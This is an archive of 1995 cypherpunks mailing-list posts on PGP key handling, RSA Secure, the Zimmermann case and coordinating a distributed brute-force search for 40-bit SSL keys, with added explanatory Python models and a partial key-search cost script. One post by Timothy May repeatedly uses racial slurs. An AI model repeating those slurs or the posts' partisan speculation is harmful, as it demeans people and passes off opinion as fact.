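    """True if the expected search time exceeds how long the data must stay secret."""
    return years_to_search(bits, rate_now, doubling_years) > secrecy_years


def survey(doubling_years=1.5):
    """Expected search time in years for every (attacker, key size) pair."""
    return {
        (name, bits): years_to_search(bits, rate, doubling_years)
        for name, rate in ATTACKERS.items()
        for bits in KEY_SIZES
    }


if __name__ == "__main__":
    for (name, bits), years in sorted(survey().items()):
        print(f"{name:12s} {bits:3d}-bit  {years:10.2f} years")
```

Once the search time is well past the doubling period, each extra key bit buys about one more doubling period, which is why the gap between 64 and 80 bits matters more than the raw numbers suggest.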





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Fri, 1 Sep 95 07:12:13 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509011005.FAA28054@mail.socketis.net>
Message-ID: <199509011410.KAA20234@libws1.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
>    I was wondering if the Zimmermann case would be a proper concern of
> Amnesty International. Phil is obviously a political dissident. His
> persecution is obviously political. If Phil got support from Amnesty
> Int'l, then his persecution could be a big embarrassment to the Federal
> gov't. He has a lot of supporters and taking up his cause could be a
> big promotional for Amnesty International. The Feds might feel forced
> to drop the matter early. Any ideas?
> 
I've heard that A.I. does not discuss political persecution as much in
the countries that are doing it, since they do not want to offend the
powers-that-be in that country, though they will note a case in another
country.  (In other words, if A.I. did note the PRZ case they'd only
discuss it outside the United States.)

This is just speculation though...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Fri, 1 Sep 95 07:12:28 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: FUHRMAN key escrow
In-Reply-To: <199509011002.FAA28046@mail.socketis.net>
Message-ID: <199509011412.KAA20264@libws1.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


>                    FUHRMAN key escrow
> 
>    Fuhrman seems to be a Godsend to us. He is helping to destroy the
> public's perceived legitimacy of state authority. If things keep moving
> the way they are, Fuhrman may join the names: John Crapper, Quisling,
> & Hooker. In which case, I propose the term, Fuhrman key escrow, to
> substitute for the term, mandatory state key escrow.

I think that the revelations of police corruption in Philadelphia
(where police have admitted to setting-up hundreds of people) may have
more effect than Fuhrman...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 1 Sep 95 07:52:59 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears...
In-Reply-To: <v02130506ac6c253a5e59@[166.84.254.3]>
Message-ID: <9509011452.AA15088@l-slide.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> I do not think that PGP 2.x can easily (ie: Automatically) use one key for
> Signing and another for Encrypting a Message (it does both at the same time
> if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
> the result but I'm not sure if doing the decrypt on such a message will
> automatically spot the signature and verify it (as would occur with a E+S
> pass).

Sure it can, and I know people who do.  Here is what you do:

1) Generate two keys.  First generate your encryption key, then
generate your signature key.  This way, your signature key will be
placed first in your secret keyring, and it will be used by default.
Alternatively, you could use two (slightly) different userIDs on the
keys and put something in your config.txt.

2) Extract the keys in reverse order into a single keyfile and then
distribute that keyfile to people.  This way, when it gets added to
other people's keyrings, the encryption key will be placed first, and
that will be used by default.

3) Proceed to use PGP normally.  When you sign a message, it will find
the signature key first and use that.  When someone wants to encrypt
to you, they will find the encryption key first.  When verifying the
signature or trying to decrypt the message, it uses the keyID to
determine which key was used, so order does not matter.

The only problem is that if someone re-orders their keyring then this
will no longer work.  E.g., if the keys are added in the wrong order.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "rudy (r.) rawlins" <rudy@bnr.ca>
Date: Fri, 1 Sep 95 10:32:48 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
Message-ID: <"8983 Fri Sep  1 11:17:28 1995"@bnr.ca>
MIME-Version: 1.0
Content-Type: text/plain


In message "Phil Zimmermann/Amnesty International?", rrothenb@ic.sunysb.edu writes:

> > 
> >    I was wondering if the Zimmermann case would be a proper concern of
> > Amnesty International. [snip]
> > 
> I've heard that A.I. does not discuss political persecution as much in
> the countries that are doing it, since they do not want to offend the
> powers-that-be in that country, though they will note a case in another
> country.  (In other words, if A.I. did note the PRZ case they'd only
> discuss it outside the United States.)
> 
> This is just speculation though...
> 

You're right on the speculation; A.I. has no such policy. As a matter of 
fact, they will meet face to face with government officials to seek the
release of 'prisoners of conscience' - which is a possible category for
Phil Z. Though Phil, despite what we may think, is not a prisoner, yet.. 

                                      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 11:13:21 PDT
To: cypherpunks@toad.com
Subject: Fuhrman needed a digital pseudonym!
Message-ID: <ac6c95850302100486b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Before you folks jump on the "racist" Mark Fuhrman, think about the
"surveillance state" issues. While it was not any government organization
that taped Fuhrman's comments, there are some real issues involved in how
deeply and how far back we want to "mine" comments made by people. Some
real issues of privacy.

The Mark Fuhrmans of the future may be interested in using technologies to
protect their privacy, to give them "plausible deniability" should their
recorded words come back to haunt them.

Brief comments:

* This post is primarily about the role of pseudonyms, not the OJ trial or
the testimony/tapes involving Mark Fuhrman.

* And the issue of "mining" of ancient records, especially as technology
makes the recording of sounds, the taping of sights, and the archiving of
electronic messages so much easier.

* Those who think this is off-topic because it has nothing to do with
coding in C are hereby invited to hit the "D" key, or whatever passes for
it, right now.


Caveat: I've watched entirely too much of the OJ trial on CNN, as I sit
here at home and surf the Net every morning. It's easy to have the
television on, and the OJ trial has had many interesting twists. When the
stuff gets boring, I switch to music or perhaps to the financial network
CNBC. So, I've seen nearly everything being talked about here.

Opinion on OJ: ***elided by Tim to head off debates about OJ's guilt or
innocence***.

(I state this to show my prejudices, not to start an "OJ debate" on this
list. Actually, I just elided (deleted) the opinion I had expressed, so as
not to inflame anyone here.)

What really bothers me, as it relates to the pro-privacy themes of this
list, is the reaching back many years to comments made by a witness--Mark
Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10
years, these comments may likely strongly influence the verdict in this
"trial of the century."

Anyone in favor of heading off the "surveillance society" should be alarmed
at this development. As tape recorders and video cameras proliferate,
comments may be compiled, taken out of context, and used as evidence.

(Who amongst us has not said "nigger"? Does it count if I am asking why the
rap group "Niggas with Attitude" chooses to label themselves as niggers? I
figure that if blacks routinely call themselves niggers and call folks like
me "honkies," then it's fair to call _them_ niggers. Not that I do this,
but I don't see the term as so horrifying as to cause a killer like OJ to
get off as this spectacle unfolds. Besides, it's become "permissible" for
black leaders to refer to New York City as "Hymietown" in a way that would
result in public stoning for a white to refer to a city as "Niggertown."
The old double standard.)

The point: Fuhrman should have used a pseudonym, should have taken steps to
protect his identity. Of course, in 1985 this would have been harder.

But have people given up the right to speak "for themselves" in private? If
there is no solid evidence that Fuhrman actually committed any crimes, but
only appeared to be puffing himself up, a la a Wambaugh wannabee, then why
are his "racist" and "sexist" comments deemed so important as to have
derailed the trial for the last couple of weeks?

I have said an awful lot of inflammatory things at Cypherpunks meetings, at
parties, in political discussions, and so forth. I don't claim that there
should be a law against people bringing these issues up, or even a law
against tape-recording various kinds of meetings. I just argue that we are
devolving into a surveillanc

To be sure, there are valid trial issues:

-- Did he misspeak, misremember, or lie when he said he had "never" used
the word "nigger" in the past 10 years? (I recall at the time, circa
Feb-March, thinking to myself "Oh, sure!," when he said he had not used the
word nigger in the past 10 years.)

-- If this is perjury, how does it affect other evidence? (I'm not a
lawyer, but I grok from the comments on CNN that this has to do with
whether his testimony was supportive of other evidence, "cumulative," and
related issues.)

-- Does this possible misspeaking, misremembering, or lying have anything
to do with whether he planted the bloody glove?

-- etc. There are various valid issues. Spending a few weeks on these
issues is another matter, though, IMHO. In my view, if I were the judge I'd
have forced this issue to be resolved in hours, not weeks.


Anyway, I am greatly disturbed by this "mining" of ancient comments, made
to a screenwriter.

Whether Fuhrman is a "racist" or not, this witch trial is a diversion from
the real issues.

And some real privacy issues are raised.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 1 Sep 95 09:49:10 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attack
In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com>
Message-ID: <9509011648.AA07795@alpha>
MIME-Version: 1.0
Content-Type: text/plain



 > > > ACK ACK
 > > ACK
 > > > ACK
 > ACK


I've just kinda been watching this debate for a while, so I may well
have missed some of the more interesting details; if so, I apologize
for my noise in advance.

I work on a lot of commercial software under constraints of
scalability much like the SSL "attack server" being discussed here.
My instincts tell me that in this situation the whole process would be
*much* simpler if the basic idea of keeping the central server (or
the family of distributed servers in those models) completely
"informed" by all the attacking clients were abandoned.

Tim May's "random attack" idea was extremely attractive, I thought.
However, I think that it'd be possible to take advantage of the fact
that the keyspace itself is basically constant (until the keysize is
increased in the protocol under attack, of course).  I mean, 40 bits
is 40 bits.  Similarly, the capacity of most clients will be fairly
consistent.  (I have access (in theory, of course; don't mention this
to my management) (hi todd) to a hundred or so CPU's here, and that
doesn't really change too often.)

Rather than apportion the search space out dynamically on each attack,
why not simply allow attack clients to "subscribe" on a semi-permanent
basis?  All the server would have to do is make batches of ciphertext
available for cracking.  When a request comes in from a subscriber for
a copy of some ciphertext, the server knows (or at least can
legitimately suspect) that that subscriber's already-known keyspace
will be searched.

As far as getting acknowledgements of search completion, again the
server can by inference assume that (based on the prior establishment
of client capabilities) after a pre-determined period of time the key
sub-space will have been searched.  It might be appropriate for
clients to send back NACK messages, in case for example somebody shuts
down the client's network unexpectedly.  Assuming this goes pretty
smoothly one would hope that the number of failures would be
considerably smaller than the number of successes.

Again, ignore me if I'm blind to something obvious.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Fri, 1 Sep 95 09:57:15 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
In-Reply-To: <9509011225.AA20540@spirit.aud.alcatel.com>
Message-ID: <9509011655.AA11645@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Daniel R. Oelke writes
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then later the server is ACKed for the full 100%. 
>
>Why?  Because what happens if the client dies immediately after doing 
>the ACK - maybe only 51% of that space has been searched, yet 
>the server has already seen an ACK for it.
>
>IMO - a % ACK is too much complexity and extra work on the server,
>which is already having trouble keeping up.

I agree.  ACKing partial segments is a bad idea.  But, when a client
is given a block of segments, partial ACKing can let poorly connected
clients communicate with the server via e-mail, and still stay busy.
When the client completely finishes half of its segments, it ACKs them
and asks for that many more segments.  The fraction can be adjusted as
mean communications latency to the server is measured.  Ideally the
new segments arrive just as the client finishes the second half of its
original segments.  This way the segments are allocated as late as
possible, letting better connected clients have a better shot at them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 12:15:40 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <199509011912.MAA29475@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I do not think that PGP 2.x can easily (ie: Automatically) use one key for
>Signing and another for Encrypting a Message (it does both at the same time
>if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
>the result but I'm not sure if doing the decrypt on such a message will
>automatically spot the signature and verify it (as would occur with a E+S
>pass).

PGP identifies the key for decryption and signature checking from the message.
When you're signing a message or key, you can pick which of your keys to
use with the -u option.  The difficulty is getting people to use your
encryption key instead of your signature key when encrypting stuff for you.
Derek mentioned one approach (get people to load the encryption key first);
unfortunately, you can't predict their behavior, and if you change encryption
keys more often than signature keys, they'll load the newest encryption key
last.
Another approach is to identify them in the names - my key certification key
says "KeyCert-only" in the text.

For the problem that started this discussion, though, there's no good solution.
Since the Bad Guys _can_ encrypt a message to you with your signature key,
and send it to you by anonymous remailer, they can plant a reason to suspect
that you may have evidence encrypted with that key.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
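
The key-selection behaviour discussed in Derek Atkins's message and in the message above can be modelled in a few lines. This is an added example, not PGP code and not from either post: the model assumes a newly added key goes to the front of a ring and that lookup by user ID returns the first match, and the key IDs, user IDs and the "(sign-only)" / "(encrypt)" labels are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Key:
    key_id: str   # constructed IDs for this example
    user_id: str
    role: str     # the owner's intent; the keyring itself does not enforce it


class Keyring:
    """Assumed model: a new key goes to the front; user-ID lookup is first match."""

    def __init__(self):
        self.keys = []

    def add(self, key):
        if self.by_key_id(key.key_id) is None:
            self.keys.insert(0, key)

    def import_keyfile(self, keyfile):
        for key in keyfile:  # keys are added one by one, in file order
            self.add(key)

    def by_user_id(self, fragment):
        """Selection used when signing by default or encrypting to a name."""
        for key in self.keys:
            if fragment.lower() in key.user_id.lower():
                return key
        return None

    def by_key_id(self, key_id):
        """Selection used when decrypting or verifying: the message names the key."""
        for key in self.keys:
            if key.key_id == key_id:
                return key
        return None


def default_is(ring, fragment, intended_role):
    """Audit check: does first-match lookup land on a key of the intended role?"""
    key = ring.by_user_id(fragment)
    return key is not None and key.role == intended_role


def build(keys_in_add_order):
    ring = Keyring()
    ring.import_keyfile(keys_in_add_order)
    return ring


ALICE = "Alice Example <alice@example.org>"
ENC = Key("0xE0000001", ALICE, "encrypt")
SIG = Key("0x50000002", ALICE, "sign")
# Same owner, but with the purpose written into the user ID text.
ENC_L = Key("0xE0000003", "Alice Example (encrypt) <alice@example.org>", "encrypt")
SIG_L = Key("0x50000004", "Alice Example (sign-only) <alice@example.org>", "sign")


def demo():
    secret = build([ENC, SIG])       # signature key generated last -> found first
    good_public = build([SIG, ENC])  # encryption key added last -> found first
    bad_public = build([ENC, SIG])   # same keys, added in the other order
    labelled = build([ENC_L, SIG_L]) # wrong order, but the user IDs say which is which
    return {
        "signs_with": secret.by_user_id("alice").role,
        "good_encrypts_to": good_public.by_user_id("alice").role,
        "bad_encrypts_to": bad_public.by_user_id("alice").role,
        "bad_ring_flagged": not default_is(bad_public, "alice", "encrypt"),
        # Decryption uses the key ID carried in the message, so order is irrelevant.
        "decrypt_lookup_ok": all(
            ring.by_key_id(ENC.key_id) == ENC for ring in (good_public, bad_public)
        ),
        "labelled_pick": labelled.by_user_id("(encrypt)").role,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running `default_is` over a correspondent's ring is the check that catches the reordering problem both messages warn about before anything is encrypted to the wrong key.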





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 12:15:26 PDT
To: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Subject: Re: Some details on RSA Secure
Message-ID: <199509011912.MAA29501@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 AM 8/31/95 PST, "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> wrote:
>Here are my biased comments on RSA Secure.  They are biased by
>the fact that I am a techie who works for RSA Data Security.
>Neatest Features:
>- It is integrated with the File Manager on Windows and the
>  Finder on Mac System 7.

It's an interesting approach - simpler than installing as a file system
(I'm not using SecDrv because it needs a separate partition),
but so far it seems relatively useable.  On the other hand,
since there are file types it refuses to encrypt, like DLLs,
there are some things it can't protect (like DLLs with passwords
embedded in them.)

>- A settable list of files can be automatically decrypted (or
>  encrypted) on system startup (or shutdown).

I've got mixed feelings about this - since my password has normally
timed out by the time I shut down, it demands a password before
shutting down, and if I had any large amount of data there,
I assume it would take a while to reencrypt on my 386-box.
(Laptops are generally slower than similar-age desktops,
and you often want to shut them down quickly, even when
they aren't shutting themselves down to save power.)
I haven't tried powering it off during this process, but I assume
that at best the files would be unencrypted and at worst there'd
be one half-decrypted and sitting in limbo to be trashed the
next time the system starts up?

>Technical Features:
>- The user's passphrase unlocks a master key that is used to unlock
>  the file encryption key for each file.

Since the documentation mentions 512-bit and 1024-bit RSA keys,
I'd guess that each file has a separate random RC4 key which is
stored in the file header, encrypted with the user and escrow
RSA keys plus the MD5 hash, plus the encrypted real filename?

(The alternative would be that the userpref.!!! file contains an
RC4 key encrypted with RSA, which is used to encrypt the file keys,
but that would lead to much shorter headers, and cracking that master
RC4 key would then allow cracking of all documents on the system,
so I'm guessing that's not the approach used.)

>Request for Improvements:

1) The "Emergency" menu item in the File Manager is annoying.
Could it be combined with the RSA menu item, eliminated, or
at least have the option of abbreviating the name?

2) Can keys and files be shared between multiple machines,
i.e. the same user keys on a desktop and laptop, so that
individual encrypted files can easily be moved back and forth?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Fri, 1 Sep 95 09:15:52 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: SSL search attack
In-Reply-To: <v02130508ac6c2efca958@[166.84.254.3]>
Message-ID: <Pine.BSD/.3.91.950901121028.7561A-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Robert A. Rosenberg wrote:

> I see nothing wrong with the concept of being allocated an initial chunk
> and having the scan software attempt to ACK it when 50% of it has been
> searched. A successful ACK would allow the releasing of a new chunk (in
> response) equal in size to the returned chunk. A failure of the Server to

The ACK process and the allocation process are separate, and should 
remain so.  They run on different servers, and they run as separate 
processes in the unix version of brloop.  A little tweaking of brloop 
could allow pre-fetching of the next segment to search, without any 
effect on the ACK process.  I dislike the idea of a client sending an ACK 
before it has searched the entire segment.

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 1 Sep 95 10:22:29 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: SSL search attack
In-Reply-To: <9509011648.AA07795@alpha>
Message-ID: <9509011721.AA07870@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > I think your assumption that available CPU is approximately constant
 > is incorrect.  Different participants have different constraints...

Hmm.  I suppose that's probably true for some more than others.
Again, hmm.

 > Also, the "subscription" process is somewhat discouraging to those
 > who participate for the prize.

Ah.  That looks like one of those little details that got by me.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Date: Thu, 31 Aug 95 19:27:21 PDT
To: cypherpunks@toad.com
Subject: sums with BIG numbers
Message-ID: <9509010227.AA28294@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone point me to any books, documentation or
whatever that will explain the methods used in routines
like bignum for doing sums with 'too-big' numbers.

I'm having a tough time trying to figure it out from the code 
;-(

Sherry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Mon, 2 Oct 95 12:44:03 PDT
To: cypherpunks@toad.com
Subject: Re: List latency.
Message-ID: <199510021942.MAA12424@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


As a non-crypto, latency-related, aside.  The USENET newsfeed coming out of
uunet to my ISP was non-existent last week.  It's improved somewhat, but is
still lagging behind by 2 or 3 days (never did this in the past).  uunet has
not provided my ISP with an explanation as to what is happening.  Perhaps
it's related to the delay in list messages appearing.  Unfounded speculation
has been the .edu sites are active again after the summer and are swamping
things.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?

>It looks like there's a considerable delay entering and leaving uunet. I'm
>not sure which machine gets the blame, but it's either toad&uunet, or
>uunet&alcor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 14:21:55 PDT
To: cypherpunks@toad.com
Subject: Re: Fuhrman needed a digital pseudonym!
Message-ID: <ac6cc467020210049bd1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:00 PM 9/1/95, Jeff Barber wrote:

>I don't see any "surveillance state" issue.  Fuhrman openly agreed to
>speak to the screenwriter.  AFAIK, he had no reason to believe the
>screenwriter wouldn't tell anyone else.  Nor should he have counted on
>that anyway.  Any loss of credibility (or other penalty) he receives
>is entirely deserved, IMO.

By the way, McKinny did not volunteer the tapes, nor did she consent to
having them taken from her and used by the Defense. Private property was
taken by a court action (the North Carolina lower court ruled that the
tapes were the property of McKinny and could not be taken, then an appeals
court overruled this decision and ordered McKinny to produce the tapes).

(It is not clear how Cochrane and his team learned of the tapes.
Speculation is that McKinny's agent or lawyer was doing some freelance
shopping-around of the script. McKinny has denied that she was trying to
sell the tapes. Regardless, they are her property and should only come in
to a court case when directly and centrally involved. This is closely
related to the Church of Scientology issue, and is being debated on another
mailing list I'm on, the Cyberia list.)

This raises serious issues. She was a screenwriter, Fuhrman was helping her
to generate a salable script. Neither was speaking for the LAPD. (Kind of
like the disclaimers we see on the Net, which I suspect are becoming
worthless.)


>> Anyway, I am greatly disturbed by this "mining" of ancient comments, made
>> to a screenwriter.
>
>Not me.  A few weeks ago there was a thread concerning the use of
>information by private "reputation" bureaus.  I can't find the thread
>in the archives but I seem to recall you defending the right of
>private entities to keep and distribute such information (my apologies
>if this was someone else).  Anyway, to me, these tapes fall clearly in

You're imputing to my comments about what will happen, and what cannot be
stopped except by coercion, a conclusion which you think is at odds with my
point here.

Just because I think people (like me, you, Laura McKinny, etc.) have the
"right" to compile records, make notes, make tapes of conversations, etc.,
does not mean I think that courts can order them given to the court. (This
is an issue I have with "discovery" in general, where even peripheral
witnesses can be compelled to turn over diaries, journals, letters, tapes,
records, financial reports, etc.)

>the same domain.  This screenwriter isn't a government agency, the
>information was freely given, and the screenwriter has every right to
>offer it for whatever purpose she deems appropriate, for free or
>for money (barring any agreements to the contrary, of which I have
>heard nothing).

Again, to make it clear, McKinney did not offer the material and fought in
the North Carolina courts to have her property kept confidential. The court
ordered her to turn it over.

(And apparently members of the defense team leaked the most damaging, and
out of context, parts, provoking Ito to announce a major investigation of
this is to come, with severe sanctions for those who leaked it.)

We need a justice system which will not be dragged into spending a full
year on this matter, with every indication that a mistrial or hung jury
will result. I look forward to a day in which an OJ would get a reasonable,
month-long trial...and then, if found guilty, be given an execution date no
longer than a month away.

As it is, OJ will be guesting on the talk show circuit. He butchers two
people--from the overwhelming mound of evidence I've seen--and essentially
cuts the head off of his ex-wife, but will likely get off as this trial
spins out of control and fragments in various ways.

Don't misunderstand my motivations: I'm sort of happy this is all
happening. It makes people even more suspicious of governments and lawyers,
and it will accelerate the disintegration of the current system.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkw@dataplex.net (Richard Wackerbarth)
Date: Fri, 1 Sep 95 12:47:20 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL search attack
Message-ID: <v02130502ac6cddb40cbe@[199.183.109.242]>
MIME-Version: 1.0
Content-Type: text/plain


I wrote
>>> Assuming that you are multi-threaded--- Simply run two "workers" on the
>>> same machine. If there are delays in getting keys assigned, the two will
>>> soon get out of phase and keep the cpu busy.
>> I kind of like that idea...
>
To which Piete Brooks replied:
>I thought of that, but:
>1) for the same server load, it doubles the number of unACKed segments
>2) if process A is lagging process B, then when process B finishes and is idle
>   waiting for the server, process A will run faster and thus reduce the lag.
>   This will make the processes drift into phase.
>   I'm not convinced one way or the other.

But you forgot that when process A finishes, process B will run faster and
re-establish its lead.

The real question is what is the parameter that we need to minimize?

Assuming that the key is distributed in the keyspace with a uniform
probability, then what we need to minimize is the expectation that two or
more workers are searching the same keyspace.

As long as we never reach the point that all of the keys have been
distributed, it does not matter how many or in what method they are
assigned. (The "fairness" WRT a prize being ignored)

The assignments only become important as we exhaust the space and must
prepare to make another pass.
Note that we never got to that point on challenge 2. The assignment of the
block containing the key was processed on its first pass and the key was
found. In this regard, it is probably "best" to first attempt to identify
those space assignments that have been lost. If we associate with each key,
either explicitly, or by inference, an expected completion time, those
segments which are most overdue are certainly good candidates for having
been lost.

Based on our previous try, and the assumption that we would not have
extremely different resources available, the master allocator would not
NEED to get reports back for the first say 12 hours.
That is not to imply that reports should be delayed that long, but only
that there is considerable opportunity to have a hierarchy of intermediate
collectors that have plenty of time to adjust their allocation algorithms
to match the ability of their workers. Later, more rapid response would be
needed. When the required response becomes too small for the "little guys",
they could be sloughed off on the next problem, leaving the "big boys" to
clean up the last pieces.

Of course, the "next" problem might be to resolve the same problem because
the correct answer was incorrectly reported as not found.

As I see it, except for perhaps the fastest of machines there is little
reason to allocate to the workers more than one segment at a time. Their
supervisor can quickly respond to requests for work and consolidate the
results to be passed up the chain. The only reason that I can see to
separate the acks from the assignments is to be able to have "memory-less"
nodes. This is certainly unnecessary if there is a web of supervisor
servers.

I have a lot more thoughts that I will defer to the next missive.

Gotta' run...

----
Richard Wackerbarth
rkw@dataplex.net
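
The allocation policy argued for in the message above, as an added example (not part of the original post, and not the code the search project ran): fresh segments go out one per request, nothing counts as searched until it is ACKed, and once the space is exhausted the most overdue unACKed segment is reissued. The class, method names, time units and sample workers are assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Set


@dataclass
class Lease:
    worker: str
    deadline: float  # expected completion time, in the caller's clock units


class SegmentAllocator:
    """Tracks keyspace segments; reissues overdue ones on later passes."""

    def __init__(self, n_segments: int) -> None:
        self.n_segments = n_segments
        self.next_fresh = 0                  # lowest never-assigned segment
        self.leases: Dict[int, Lease] = {}   # assigned but not yet ACKed
        self.done: Set[int] = set()          # ACKed, i.e. actually searched
        self.duplicates = 0                  # reissues = possible double work

    def assign(self, worker: str, now: float,
               expected_secs: float) -> Optional[int]:
        """Give `worker` one segment, or None if it should wait."""
        if self.next_fresh < self.n_segments:
            # First pass: order does not matter, so hand out the next one.
            seg = self.next_fresh
            self.next_fresh += 1
        else:
            # Space exhausted: candidates are leases past their expected
            # completion time and held by some other worker.
            overdue = [(lease.deadline, seg)
                       for seg, lease in self.leases.items()
                       if lease.deadline < now and lease.worker != worker]
            if not overdue:
                return None  # nothing looks lost; avoid duplicate searching
            _, seg = min(overdue)  # earliest deadline = most overdue
            self.duplicates += 1
        self.leases[seg] = Lease(worker, now + expected_secs)
        return seg

    def ack(self, seg: int) -> bool:
        """Record a segment as searched. True only the first time."""
        if seg in self.done or not 0 <= seg < self.next_fresh:
            return False
        self.done.add(seg)
        self.leases.pop(seg, None)
        return True

    def complete(self) -> bool:
        return len(self.done) == self.n_segments


def demo():
    """Constructed run: four segments, worker C takes one and goes silent."""
    alloc = SegmentAllocator(4)
    log = []
    log.append(alloc.assign("A", 0, 100))    # segment 0
    log.append(alloc.assign("B", 0, 100))    # segment 1
    log.append(alloc.assign("C", 0, 50))     # segment 2, never ACKed by C
    alloc.ack(0)
    log.append(alloc.assign("A", 90, 100))   # segment 3, the last fresh one
    alloc.ack(1)
    log.append(alloc.assign("B", 95, 100))   # segment 2 reissued (overdue)
    log.append(alloc.assign("D", 100, 100))  # None: no lease is overdue
    alloc.ack(3)
    alloc.ack(2)
    return log, alloc.duplicates, alloc.complete()


if __name__ == "__main__":
    print(demo())
```

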